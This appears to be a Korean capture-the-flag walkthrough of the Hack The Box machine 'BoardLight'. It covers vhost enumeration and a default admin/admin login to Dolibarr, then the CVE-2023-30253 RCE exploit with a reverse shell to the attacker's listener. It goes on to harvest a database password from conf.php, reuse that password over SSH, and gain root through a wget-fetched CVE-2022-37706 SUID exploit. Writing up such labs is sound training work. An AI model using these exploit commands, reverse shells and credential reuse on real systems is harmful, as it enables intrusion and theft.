Proof of Concept
10.129.231.37
Nmap
PORT STATE SERVICE
22/tcp open ssh
80/tcp open httpInitial Access
http://10.129.231.37/ 접속 후 Footer에서 도메인 주소 발견
- board.htb
/etc/hosts 파일 설정
┌──(kali㉿kali)-[~/BoardLight]
└─$ cat /etc/hosts
<SNIP>
10.129.231.37 board.htb서브도메인 탐색
- crm.board.htb 발견
┌──(kali㉿kali)-[~/BoardLight]
└─$ gobuster vhost -u http://board.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -t 100 --append-domain
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://board.htb
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
[+] Append Domain: true
[+] Exclude Hostname Length: false
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
crm.board.htb Status: 200 [Size: 6360]
#www.board.htb Status: 400 [Size: 301]
#mail.board.htb Status: 400 [Size: 301]
Progress: 19966 / 19966 (100.00%)
===============================================================
Finished
===============================================================/etc/hosts 파일에 서브도메인 추가
┌──(kali㉿kali)-[~/BoardLight]
└─$ cat /etc/hosts
<SNIP>
10.129.231.37 board.htb crm.board.htbhttp://crm.board.htb 접속 시 로그인 페이지가 뜨며, admin/admin으로 로그인 성공
로그인 페이지에서 Dolibarr 17.0.0 서비스를 사용중인 것을 확인했으며, 해당 버전에서 RCE 취약점 발견 (CVE-2023-30253)
POC 다운로드
┌──(kali㉿kali)-[~/BoardLight]
└─$ git clone https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253.git
Cloning into 'Exploit-for-Dolibarr-17.0.0-CVE-2023-30253'...
remote: Enumerating objects: 18, done.
remote: Counting objects: 100% (18/18), done.
remote: Compressing objects: 100% (16/16), done.
remote: Total 18 (delta 3), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (18/18), 9.17 KiB | 4.59 MiB/s, done.
Resolving deltas: 100% (3/3), done.POC 실행
┌──(kali㉿kali)-[~/BoardLight/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253]
└─$ python exploit.py http://crm.board.htb admin admin 10.10.14.17 4444
[*] Trying authentication...
[**] Login: admin
[**] Password: admin
[*] Trying created site...
[*] Trying created page...
[*] Trying editing page and call reverse shell... Press Ctrl+C after successful connection리버스쉘 연결 성공
┌──(kali㉿kali)-[~/BoardLight]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.17] from (UNKNOWN) [10.129.231.37] 43766
bash: cannot set terminal process group (814): Inappropriate ioctl for device
bash: no job control in this shell
www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$Lateral Movement (auth as larissa)
~/html/crm.board.htb/htdocs/conf/conf.php 파일에서 비밀번호 발견
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ cat conf.php
cat conf.php
<?php
//
// File generated by Dolibarr installer 17.0.0 on May 13, 2024
//
// Take a look at conf.php.example file for an example of conf.php file
// and explanations for all possibles parameters.
//
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
<SNIP>발견한 비밀번호를 사용해서 larissa 계정으로 SSH 접속 성공
┌──(kali㉿kali)-[~/BoardLight/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253]
└─$ sshpass -p 'serverfun2$2023!!' ssh larissa@10.129.231.37
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
larissa@boardlight:~$Read user.txt
larissa@boardlight:~$ cat user.txt
bde6264799d9524fddbe145563d271ff
larissa@boardlight:~$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.129.231.37 netmask 255.255.0.0 broadcast 10.129.255.255
inet6 dead:beef::250:56ff:feb0:c7d4 prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb0:c7d4 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b0:c7:d4 txqueuelen 1000 (Ethernet)
RX packets 822119 bytes 76192948 (76.1 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 772424 bytes 300527489 (300.5 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 10390 bytes 817888 (817.8 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 10390 bytes 817888 (817.8 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0Privilege Escalation
linux-smart-enumeration 실행 후 비정상적인 setuid 바이너리 파일 발견
<SNIP>
---
[!] fst020 Uncommon setuid binaries........................................ yes!
---
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
/usr/bin/vmware-user-suid-wrapper
<SNIP>enlightenment 버전 확인
- Version: 0.23.1
larissa@boardlight:~$ enlightenment -version
ESTART: 0.00001 [0.00001] - Begin Startup
ESTART: 0.00007 [0.00006] - Signal Trap
ESTART: 0.00008 [0.00001] - Signal Trap Done
ESTART: 0.00010 [0.00002] - Eina Init
ESTART: 0.00053 [0.00043] - Eina Init Done
ESTART: 0.00055 [0.00002] - Determine Prefix
ESTART: 0.00075 [0.00020] - Determine Prefix Done
ESTART: 0.00077 [0.00002] - Environment Variables
ESTART: 0.00079 [0.00002] - Environment Variables Done
ESTART: 0.00079 [0.00001] - Parse Arguments
Version: 0.23.1
E: Begin Shutdown Procedure!enlightenment 버전 0.23.1에서 Privilege escalation in Enlightenment window manager 취약점 발견 (CVE-2022-37706)
POC 다운로드
┌──(kali㉿kali)-[~/BoardLight]
└─$ git clone https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit.git
Cloning into 'CVE-2022-37706-LPE-exploit'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (92/92), done.
remote: Compressing objects: 100% (92/92), done.
remote: Total 92 (delta 32), reused 14 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (92/92), 498.76 KiB | 1.62 MiB/s, done.
Resolving deltas: 100% (32/32), done.칼리 리눅스에서 타겟으로 POC 코드 이동 후 실행하여 root 쉘 획득
larissa@boardlight:~$ wget http://10.10.14.17:8000/exploit.sh
--2026-02-03 08:18:49-- http://10.10.14.17:8000/exploit.sh
Connecting to 10.10.14.17:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 709 [application/x-sh]
Saving to: ‘exploit.sh’
exploit.sh 100%[==============================================================================================>] 709 --.-KB/s in 0.001s
2026-02-03 08:18:50 (603 KB/s) - ‘exploit.sh’ saved [709/709]
larissa@boardlight:~$ chmod a+x exploit.sh
larissa@boardlight:~$ ./exploit.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# Read root.txt
# cat root.txt
15683a906987124202a9eed46013b41e
# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.129.231.37 netmask 255.255.0.0 broadcast 10.129.255.255
inet6 dead:beef::250:56ff:feb0:c7d4 prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb0:c7d4 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b0:c7:d4 txqueuelen 1000 (Ethernet)
RX packets 825869 bytes 76573934 (76.5 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 773922 bytes 300807675 (300.8 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 11884 bytes 935442 (935.4 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 11884 bytes 935442 (935.4 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0